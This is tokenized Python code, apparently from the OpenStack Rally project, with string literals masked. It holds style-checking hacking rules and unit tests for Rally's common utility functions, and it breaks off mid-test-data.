) : <EOL> """<STR_LIT>""" <EOL> res = ( re_assert_equal_start_with_none . search ( logical_line ) or <EOL> re_assert_equal_end_with_none . search ( logical_line ) ) <EOL> if res : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def assert_true_or_false_with_in ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> res = ( re_assert_true_false_with_in_or_not_in . search ( logical_line ) or <EOL> re_assert_true_false_with_in_or_not_in_spaces . search ( logical_line ) ) <EOL> if res : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def assert_equal_in ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> res = ( re_assert_equal_in_end_with_true_or_false . search ( logical_line ) or <EOL> re_assert_equal_in_start_with_true_or_false . search ( logical_line ) ) <EOL> if res : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def check_no_direct_rally_objects_import ( logical_line , physical_line , <EOL> filename ) : <EOL> """<STR_LIT>""" <EOL> if filename == "<STR_LIT>" : <EOL> return <EOL> if filename == "<STR_LIT>" : <EOL> return <EOL> if ( logical_line . startswith ( "<STR_LIT>" ) <EOL> or logical_line . startswith ( "<STR_LIT>" ) ) : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def check_no_oslo_deprecated_import ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> if ( logical_line . startswith ( "<STR_LIT>" ) <EOL> or logical_line . startswith ( "<STR_LIT>" ) ) : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def check_quotes ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> in_string = False <EOL> in_multiline_string = False <EOL> single_quotas_are_used = False <EOL> check_tripple = ( <EOL> lambda line , i , char : ( <EOL> i + <NUM_LIT:2> < len ( line ) and <EOL> ( char == line [ i ] == line [ i + <NUM_LIT:1> ] == line [ i + <NUM_LIT:2> ] ) <EOL> ) <EOL> ) <EOL> i = <NUM_LIT:0> <EOL> while i < len ( logical_line ) : <EOL> char = logical_line [ i ] <EOL> if in_string : <EOL> if char == "<STR_LIT>" : <EOL> in_string = False <EOL> if char == "<STR_LIT:\\>" : <EOL> i += <NUM_LIT:1> <EOL> elif in_multiline_string : <EOL> if check_tripple ( logical_line , i , "<STR_LIT>" ) : <EOL> i += <NUM_LIT:2> <EOL> in_multiline_string = False <EOL> elif char == "<STR_LIT:#>" : <EOL> break <EOL> elif char == "<STR_LIT:'>" : <EOL> single_quotas_are_used = True <EOL> break <EOL> elif char == "<STR_LIT>" : <EOL> if check_tripple ( logical_line , i , "<STR_LIT>" ) : <EOL> in_multiline_string = True <EOL> i += <NUM_LIT:3> <EOL> continue <EOL> in_string = True <EOL> i += <NUM_LIT:1> <EOL> if single_quotas_are_used : <EOL> yield ( i , "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def check_no_constructor_data_struct ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> match = re_no_construct_dict . search ( logical_line ) <EOL> if match : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" ) <EOL> match = re_no_construct_list . search ( logical_line ) <EOL> if match : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" ) <EOL> def check_dict_formatting_in_string ( logical_line , tokens ) : <EOL> """<STR_LIT>""" <EOL> if ( not logical_line or <EOL> logical_line . startswith ( "<STR_LIT:#>" ) or <EOL> logical_line . endswith ( "<STR_LIT>" ) ) : <EOL> return <EOL> current_string = "<STR_LIT>" <EOL> in_string = False <EOL> for token_type , text , start , end , line in tokens : <EOL> if token_type == tokenize . STRING : <EOL> if not in_string : <EOL> current_string = "<STR_LIT>" <EOL> in_string = True <EOL> current_string += text . strip ( "<STR_LIT>" ) <EOL> elif token_type == tokenize . OP : <EOL> if not current_string : <EOL> continue <EOL> in_string = False <EOL> if text == "<STR_LIT:%>" : <EOL> format_keys = set ( ) <EOL> for match in re_str_format . finditer ( current_string ) : <EOL> format_keys . add ( match . group ( <NUM_LIT:1> ) ) <EOL> if len ( format_keys ) == <NUM_LIT:1> : <EOL> yield ( <NUM_LIT:0> , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if text != "<STR_LIT:)>" : <EOL> current_string = "<STR_LIT>" <EOL> elif token_type in ( tokenize . NL , tokenize . COMMENT ) : <EOL> continue <EOL> else : <EOL> in_string = False <EOL> if token_type == tokenize . NEWLINE : <EOL> current_string = "<STR_LIT>" <EOL> @ skip_ignored_lines <EOL> def check_using_unicode ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> if re . search ( r"<STR_LIT>" , logical_line ) : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def check_raises ( physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> ignored_files = [ "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> if filename not in ignored_files : <EOL> if re_raises . search ( physical_line ) : <EOL> return ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def check_old_type_class ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> if re_old_type_class . search ( logical_line ) : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def check_datetime_alias ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> if re_datetime_alias . search ( logical_line ) : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def check_db_imports_in_cli ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> if ( not filename . startswith ( "<STR_LIT>" ) <EOL> or filename == "<STR_LIT>" ) : <EOL> return <EOL> if re_db_import . search ( logical_line ) : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ skip_ignored_lines <EOL> def check_objects_imports_in_cli ( logical_line , physical_line , filename ) : <EOL> """<STR_LIT>""" <EOL> if ( not filename . startswith ( "<STR_LIT>" ) <EOL> or filename == "<STR_LIT>" ) : <EOL> return <EOL> if re_objects_import . search ( logical_line ) : <EOL> yield ( <NUM_LIT:0> , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def factory ( register ) : <EOL> register ( check_assert_methods_from_mock ) <EOL> register ( check_import_of_logging ) <EOL> register ( no_translate_debug_logs ) <EOL> register ( no_use_conf_debug_check ) <EOL> register ( assert_true_instance ) <EOL> register ( assert_equal_type ) <EOL> register ( assert_equal_none ) <EOL> register ( assert_true_or_false_with_in ) <EOL> register ( assert_equal_in ) <EOL> register ( check_no_direct_rally_objects_import ) <EOL> register ( check_no_oslo_deprecated_import ) <EOL> register ( check_quotes ) <EOL> register ( check_no_constructor_data_struct ) <EOL> register ( check_dict_formatting_in_string ) <EOL> register ( check_using_unicode ) <EOL> register ( check_raises ) <EOL> register ( check_datetime_alias ) <EOL> register ( check_db_imports_in_cli ) <EOL> register ( check_objects_imports_in_cli ) <EOL> register ( check_old_type_class ) </s>
<s> from __future__ import print_function <EOL> import string <EOL> import sys <EOL> import threading <EOL> import time <EOL> import ddt <EOL> import mock <EOL> from six . moves import queue as Queue <EOL> import testtools <EOL> from rally . common import utils <EOL> from rally import exceptions <EOL> from tests . unit import test <EOL> class ImmutableMixinTestCase ( test . TestCase ) : <EOL> def test_without_base_values ( self ) : <EOL> im = utils . ImmutableMixin ( ) <EOL> self . assertRaises ( exceptions . ImmutableException , <EOL> im . __setattr__ , "<STR_LIT:test>" , "<STR_LIT:test>" ) <EOL> def test_with_base_values ( self ) : <EOL> class A ( utils . ImmutableMixin ) : <EOL> def __init__ ( self , test ) : <EOL> self . test = test <EOL> super ( A , self ) . __init__ ( ) <EOL> a = A ( "<STR_LIT:test>" ) <EOL> self . assertRaises ( exceptions . ImmutableException , <EOL> a . __setattr__ , "<STR_LIT:abc>" , "<STR_LIT:test>" ) <EOL> self . assertEqual ( a . test , "<STR_LIT:test>" ) <EOL> class EnumMixinTestCase ( test . TestCase ) : <EOL> def test_enum_mix_in ( self ) : <EOL> class Foo ( utils . EnumMixin ) : <EOL> a = <NUM_LIT:10> <EOL> b = <NUM_LIT:20> <EOL> CC = "<STR_LIT>" <EOL> self . assertEqual ( set ( list ( Foo ( ) ) ) , set ( [ <NUM_LIT:10> , <NUM_LIT:20> , "<STR_LIT>" ] ) ) <EOL> def test_with_underscore ( self ) : <EOL> class Foo ( utils . EnumMixin ) : <EOL> a = <NUM_LIT:10> <EOL> b = <NUM_LIT:20> <EOL> _CC = "<STR_LIT>" <EOL> self . assertEqual ( set ( list ( Foo ( ) ) ) , set ( [ <NUM_LIT:10> , <NUM_LIT:20> ] ) ) <EOL> class StdIOCaptureTestCase ( test . TestCase ) : <EOL> def test_stdout_capture ( self ) : <EOL> stdout = sys . stdout <EOL> messages = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> with utils . StdOutCapture ( ) as out : <EOL> for msg in messages : <EOL> print ( msg ) <EOL> self . assertEqual ( out . getvalue ( ) . rstrip ( "<STR_LIT:\n>" ) . split ( "<STR_LIT:\n>" ) , messages ) <EOL> self . assertEqual ( stdout , sys . stdout ) <EOL> def test_stderr_capture ( self ) : <EOL> stderr = sys . stderr <EOL> messages = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> with utils . StdErrCapture ( ) as err : <EOL> for msg in messages : <EOL> print ( msg , file = sys . stderr ) <EOL> self . assertEqual ( err . getvalue ( ) . rstrip ( "<STR_LIT:\n>" ) . split ( "<STR_LIT:\n>" ) , messages ) <EOL> self . assertEqual ( stderr , sys . stderr ) <EOL> class TimerTestCase ( test . TestCase ) : <EOL> def test_timer_duration ( self ) : <EOL> start_time = time . time ( ) <EOL> end_time = time . time ( ) <EOL> with mock . patch ( "<STR_LIT>" ) as mock_time : <EOL> mock_time . time = mock . MagicMock ( return_value = start_time ) <EOL> with utils . Timer ( ) as timer : <EOL> mock_time . time = mock . MagicMock ( return_value = end_time ) <EOL> self . assertIsNone ( timer . error ) <EOL> self . assertEqual ( end_time - start_time , timer . duration ( ) ) <EOL> def test_timer_exception ( self ) : <EOL> try : <EOL> with utils . Timer ( ) as timer : <EOL> raise Exception ( ) <EOL> except Exception : <EOL> pass <EOL> self . assertEqual ( <NUM_LIT:3> , len ( timer . error ) ) <EOL> self . assertEqual ( timer . error [ <NUM_LIT:0> ] , type ( Exception ( ) ) ) <EOL> def module_level_method ( ) : <EOL> pass <EOL> class MethodClassTestCase ( test . TestCase ) : <EOL> @ testtools . skipIf ( sys . version_info > ( <NUM_LIT:2> , <NUM_LIT:9> ) , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def test_method_class_for_class_level_method ( self ) : <EOL> class A ( object ) : <EOL> def m ( self ) : <EOL> pass <EOL> self . assertEqual ( A , utils . get_method_class ( A . m ) ) <EOL> def test_method_class_for_module_level_method ( self ) : <EOL> self . assertIsNone ( utils . get_method_class ( module_level_method ) ) <EOL> class FirstIndexTestCase ( test . TestCase ) : <EOL> def test_list_with_existing_matching_element ( self ) : <EOL> lst = [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:7> ] <EOL> self . assertEqual ( utils . first_index ( lst , lambda e : e == <NUM_LIT:1> ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( utils . first_index ( lst , lambda e : e == <NUM_LIT:5> ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( utils . first_index ( lst , lambda e : e == <NUM_LIT:7> ) , <NUM_LIT:3> ) <EOL> def test_list_with_non_existing_matching_element ( self ) : <EOL> lst = [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:7> ] <EOL> self . assertIsNone ( utils . first_index ( lst , lambda e : e == <NUM_LIT:2> ) ) <EOL> class EditDistanceTestCase ( test . TestCase ) : <EOL> def test_distance_empty_strings ( self ) : <EOL> dist = utils . distance ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:0> , dist ) <EOL> def test_distance_equal_strings ( self ) : <EOL> dist = utils . distance ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:0> , dist ) <EOL> def test_distance_replacement ( self ) : <EOL> dist = utils . distance ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:2> , dist ) <EOL> def test_distance_insertion ( self ) : <EOL> dist = utils . distance ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:2> , dist ) <EOL> def test_distance_deletion ( self ) : <EOL> dist = utils . distance ( "<STR_LIT>" , "<STR_LIT:abc>" ) <EOL> self . assertEqual ( <NUM_LIT:2> , dist ) <EOL> class TenantIteratorTestCase ( test . TestCase ) : <EOL> def test_iterate_per_tenant ( self ) : <EOL> users = [ ] <EOL> tenants_count = <NUM_LIT:2> <EOL> users_per_tenant = <NUM_LIT:5> <EOL> for tenant_id in range ( tenants_count ) : <EOL> for user_id in range ( users_per_tenant ) : <EOL> users . append ( { "<STR_LIT:id>" : str ( user_id ) , <EOL> "<STR_LIT>" : str ( tenant_id ) } ) <EOL> expected_result = [ <EOL> ( { "<STR_LIT:id>" : "<STR_LIT:0>" , "<STR_LIT>" : str ( i ) } , str ( i ) ) for i in range ( <EOL> tenants_count ) ] <EOL> real_result = [ i for i in utils . iterate_per_tenants ( users ) ] <EOL> self . assertEqual ( expected_result , real_result ) <EOL> class RAMIntTestCase ( test . TestCase ) : <EOL> def test__int__ ( self ) : <EOL> self . assertEqual ( <NUM_LIT:0> , int ( utils . RAMInt ( ) ) ) <EOL> self . assertEqual ( <NUM_LIT:10> , int ( utils . RAMInt ( <NUM_LIT:10> ) ) ) <EOL> def test__str__ ( self ) : <EOL> self . assertEqual ( "<STR_LIT:0>" , str ( utils . RAMInt ( ) ) ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( utils . RAMInt ( <NUM_LIT:20> ) ) ) <EOL> def test__next__ ( self ) : <EOL> ri = utils . RAMInt ( ) <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:3> ) : <EOL> self . assertEqual ( i , next ( ri ) ) <EOL> def test_next ( self ) : <EOL> ri = utils . RAMInt ( ) <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:3> ) : <EOL> self . assertEqual ( i , ri . next ( ) ) <EOL> def test_reset ( self ) : <EOL> ri = utils . RAMInt ( ) <EOL> ri . next ( ) <EOL> ri . reset ( ) <EOL> self . assertEqual ( <NUM_LIT:0> , int ( ri ) ) <EOL> @ ddt . ddt <EOL> class RandomNameTestCase ( test . TestCase ) : <EOL> @ ddt . data ( <EOL> { } , <EOL> { "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } ) <EOL> @ ddt . unpack <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> def test_generate_random_name ( self , mock_choice , task_id = "<STR_LIT>" , <EOL> expected = "<STR_LIT>" , <EOL> fmt = "<STR_LIT>" ) : <EOL> class FakeNameGenerator ( utils . RandomNameGeneratorMixin ) : <EOL> RESOURCE_NAME_FORMAT = fmt <EOL> task = { "<STR_LIT>" : task_id } <EOL> generator = FakeNameGenerator ( ) <EOL> mock_choice . side_effect = iter ( "<STR_LIT>" ) <EOL> self . assertEqual ( generator . generate_random_name ( ) , expected ) <EOL> class FakeNameGenerator ( utils . RandomNameGeneratorMixin ) : <EOL> RESOURCE_NAME_FORMAT = fmt <EOL> verification = { "<STR_LIT>" : task_id } <EOL> generator = FakeNameGenerator ( ) <EOL> mock_choice . side_effect = iter ( "<STR_LIT>" ) <EOL> self . assertEqual ( generator . generate_random_name ( ) , expected ) <EOL> def test_generate_random_name_bogus_name_format ( self ) : <EOL> class FakeNameGenerator ( utils . RandomNameGeneratorMixin ) : <EOL> RESOURCE_NAME_FORMAT = "<STR_LIT>" <EOL> task = { "<STR_LIT>" : "<STR_LIT>" } <EOL> generator = FakeNameGenerator ( ) <EOL> self . assertRaises ( ValueError , <EOL> generator . generate_random_name ) <EOL> @ ddt . data ( <EOL> { "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT:foo>" , "<STR_LIT>" ) } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ) } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ) } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:foo>" , "<STR_LIT>" ) } , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , ) , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ) } ) <EOL> @ ddt . unpack <EOL> def test_cls_name_matches_object ( <EOL> self , good = ( ) , bad = ( ) , fmt = "<STR_LIT>" , <EOL> chars = string . ascii_letters + string . digits , task_id = None , <EOL> exact = True ) : <EOL> class FakeNameGenerator ( utils . RandomNameGeneratorMixin ) : <EOL> RESOURCE_NAME_FORMAT = fmt <EOL> RESOURCE_NAME_ALLOWED_CHARACTERS = chars <EOL> task = { "<STR_LIT>" : task_id or "<STR_LIT>" } <EOL> for name in good : <EOL> self . assertTrue ( <EOL> FakeNameGenerator . name_matches_object ( name , task_id , exact ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> { "<STR_LIT:name>" : name , "<STR_LIT>" : fmt , "<STR_LIT>" : exact } ) <EOL> for name in bad : <EOL> self . assertFalse ( <EOL> FakeNameGenerator . name_matches_object ( name , task_id , exact ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> { "<STR_LIT:name>" : name , "<STR_LIT>" : fmt , "<STR_LIT>" : exact } ) <EOL> def test_name_matches_object ( self ) : <EOL> name = "<STR_LIT:foo>" <EOL> obj = mock . Mock ( ) <EOL> self . assertTrue ( utils . name_matches_object ( name , obj ) ) <EOL> obj . name_matches_object . assert_called_once_with ( name ) <EOL> def test_name_matches_object_kwargs ( self ) : <EOL> name = "<STR_LIT:foo>" <EOL> obj = mock . Mock ( ) <EOL> self . assertTrue ( utils . name_matches_object ( name , obj , task_id = "<STR_LIT>" , <EOL> exact = False ) ) <EOL> obj . name_matches_object . assert_called_once_with ( name , task_id = "<STR_LIT>" , <EOL> exact = False ) <EOL> def test_name_matches_object_identical_list ( self ) : <EOL> class One ( utils . RandomNameGeneratorMixin ) : <EOL> name_matches_object = mock . Mock ( return_value = False ) <EOL> class Two ( utils . RandomNameGeneratorMixin ) : <EOL> name_matches_object = mock . Mock ( return_value = False ) <EOL> name = "<STR_LIT:foo>" <EOL> self . assertFalse ( utils . name_matches_object ( name , One , Two ) ) <EOL> self . assertItemsEqual ( <EOL> One . name_matches_object . call_args_list + <EOL> Two . name_matches_object . call_args_list , <EOL> [ mock . call ( name ) ] ) <EOL> def test_name_matches_object_differing_list ( self ) : <EOL> class One ( utils . RandomNameGeneratorMixin ) : <EOL> name_matches_object = mock . Mock ( return_value = False ) <EOL> class Two ( utils . RandomNameGeneratorMixin ) : <EOL> RESOURCE_NAME_FORMAT = "<STR_LIT>" <EOL> name_matches_object = mock . Mock ( return_value = False ) <EOL> class Three ( utils . RandomNameGeneratorMixin ) : <EOL> RESOURCE_NAME_ALLOWED_CHARACTERS = "<STR_LIT>" <EOL> name_matches_object = mock . Mock ( return_value = False ) <EOL> class Four ( utils . RandomNameGeneratorMixin ) : <EOL> RESOURCE_NAME_FORMAT = "<STR_LIT>" <EOL> RESOURCE_NAME_ALLOWED_CHARACTERS = "<STR_LIT>" <EOL> name_matches_object = mock . Mock ( return_value = False ) <EOL> classes = ( One , Two , Three , Four ) <EOL> name = "<STR_LIT:foo>" <EOL> self . assertFalse ( utils . name_matches_object ( name , * classes ) ) <EOL> for cls in classes : <EOL> cls . name_matches_object . assert_called_once_with ( name ) <EOL> def test_cls_name_matches_object_identity ( self ) : <EOL> generator = utils . RandomNameGeneratorMixin ( ) <EOL> generator . task = { "<STR_LIT>" : "<STR_LIT>" } <EOL> self . assertTrue ( generator . name_matches_object ( <EOL> generator . generate_random_name ( ) ) ) <EOL> self . assertTrue ( utils . RandomNameGeneratorMixin . name_matches_object ( <EOL> generator . generate_random_name ( ) ) ) <EOL> def test_name_matches_object_identity ( self ) : <EOL> generator = utils . RandomNameGeneratorMixin ( ) <EOL> generator . task = { "<STR_LIT>" : "<STR_LIT>" } <EOL> self . assertTrue ( utils . name_matches_object ( <EOL> generator . generate_random_name ( ) , generator ) ) <EOL> self . assertTrue ( utils . name_matches_object ( <EOL> generator . generate_random_name ( ) , utils . RandomNameGeneratorMixin ) ) <EOL> def test_consistent_task_id_part ( self ) : <EOL> class FakeNameGenerator ( utils . RandomNameGeneratorMixin ) : <EOL> RESOURCE_NAME_FORMAT = "<STR_LIT>" <EOL> generator = FakeNameGenerator ( ) <EOL> generator . task = { "<STR_LIT>" : "<STR_LIT>" } <EOL> names = [ generator . generate_random_name ( ) for i in range ( <NUM_LIT:100> ) ] <EOL> task_id_parts = set ( [ n . split ( "<STR_LIT:_>" ) [ <NUM_LIT:0> ] for n in names ] ) <EOL> self . assertEqual ( len ( task_id_parts ) , <NUM_LIT:1> ) <EOL> generator . task = { "<STR_LIT>" : "<STR_LIT>" } <EOL> names = [ generator . generate_random_name ( ) for i in range ( <NUM_LIT:100> ) ] <EOL> task_id_parts = set ( [ n . split ( "<STR_LIT:_>" ) [ <NUM_LIT:0> ] for n in names ] ) <EOL> self . assertEqual ( len ( task_id_parts ) , <NUM_LIT:1> ) <EOL> @ ddt . ddt <EOL> class MergeTestCase ( test . TestCase ) : <EOL> @ ddt . data ( <EOL> { "<STR_LIT>" : [ [ [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> ] , [ <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:4> ] , [ <NUM_LIT:9> , <NUM_LIT:10> ] , [ <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT:5> ] , [ <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:11> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] ] , <EOL> "<STR_LIT>" : [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:7> ] , <EOL> [ <NUM_LIT:7> , <NUM_LIT:9> , <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:16> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] } , <EOL> { "<STR_LIT>" : [ [ [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> ] , [ <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:4> ] , [ <NUM_LIT:9> , <NUM_LIT:10> ] , [ <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT:5> ] , [ <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:11> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ ] ] , <EOL> "<STR_LIT>" : [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:7> ] , <EOL> [ <NUM_LIT:7> , <NUM_LIT:9> , <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:16> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] } , <EOL> { "<STR_LIT>" : [ [ [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> ] , [ <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:4> ] , [ <NUM_LIT:9> , <NUM_LIT:10> ] , [ <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT:5> ] , [ <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:11> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ ] ] ] , <EOL> "<STR_LIT>" : [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:7> ] , <EOL> [ <NUM_LIT:7> , <NUM_LIT:9> , <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:16> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] } , <EOL> { "<STR_LIT>" : [ [ [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> ] , [ ] , [ ] , [ <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ ] , [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:4> ] , [ <NUM_LIT:9> , <NUM_LIT:10> ] , [ <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ [ <NUM_LIT:5> ] , [ <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:11> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , [ ] ] ] , <EOL> "<STR_LIT>" : [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:7> ] , <EOL> [ <NUM_LIT:7> , <NUM_LIT:9> , <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:16> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , 